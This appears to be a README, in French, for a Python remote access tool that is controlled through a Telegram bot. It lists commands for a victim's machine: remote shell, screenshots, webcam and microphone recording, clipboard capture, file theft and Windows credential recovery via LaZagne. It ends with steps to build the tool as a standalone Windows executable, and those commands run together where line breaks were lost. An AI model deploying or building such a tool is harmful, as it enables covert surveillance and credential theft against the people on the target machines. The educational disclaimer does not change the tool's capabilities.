
🔮 Outil d'administration à distance en Python via Telegram
Outil d'administration à distance multi-plateforme via Telegram
Codé avec ❤️ python3 + aiogram3
https://t.me/wh_lab
Screenshots
Toutes les informations contenues dans ce dépôt sont fournies à des fins éducatives et de recherche uniquement
L'auteur n'est pas responsable de toute utilisation illégale de cet outil
🔗 Un grand merci au projet LaZagne
🔗 Tous les logiciels supportés
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
/winpass - credentials recovery
Press button to download file
Send any file as file for upload to target
git clone https://github.com/akhomlyuk/pyradm.gitcd pyradmpip3 install -r requirements.txtPut bot token to cfg.py, ask @Bothfatherpython3 main.pyPut bot token to cfg.pypip install nuitkanuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py
